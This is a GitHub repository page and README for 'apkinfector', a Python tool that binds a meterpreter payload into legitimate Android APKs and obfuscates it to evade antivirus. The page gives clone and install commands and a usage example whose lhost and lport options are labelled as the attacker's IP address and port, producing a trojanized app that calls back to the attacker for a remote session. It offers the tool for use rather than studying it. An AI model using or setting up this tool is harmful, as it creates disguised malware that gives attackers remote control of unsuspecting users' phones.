PushpenderIndia / apkinfector

Advanced Android AV Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK
283 stars 75 forks source link
antivirus-evasion apk-binder apk-embed apk-payload-generator apkinfector meterpreter python3

APK Infector Logo

APK Infector

                    This small python script can do really awesome work.

Advanced Android Antivirus Evasion Tool Written In Python 3 that can Embed/Bind meterpreter APK to any Legitimate APK & can completely ofusticate the meterpreter payload with different techniques.

Features

Tools Overview

Front View Sample Feature
Index f

Prerequisite

Tested On

Kali) Kali Linux - 2019.4

Installation & Usage


# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/apkinfector.git

# Navigate to technowlogger folder
$ cd apkinfector

# Installing dependencies
$ apt-get update && apt-get install apktool && apt-get install zipalign && apt-get install apksigner

# Running the Tool for 1st Time
$ python3 infector.py --help

# Usage Example
$ python3 infector.py --lhost 192.168.43.70 --lport 4444 --apk-name NEW_APK_NAME --normal-apk /root/Desktop/Path/TO/Legitemate_APK_File.apk

Available Arguments

Short Hand Full Hand Description
-h --help show this help message and exit
Short Hand Full Hand Description
--lhost 192.168.44.33 Attacker's IP Address
--lport 4444 Attacker's Port
-n NORMAL_APK --normal-apk NORMAL_APK Absolute Path of Legitimate APK File
--apk-name APKNAME APK Name (Anything You Want To Name)

Contribute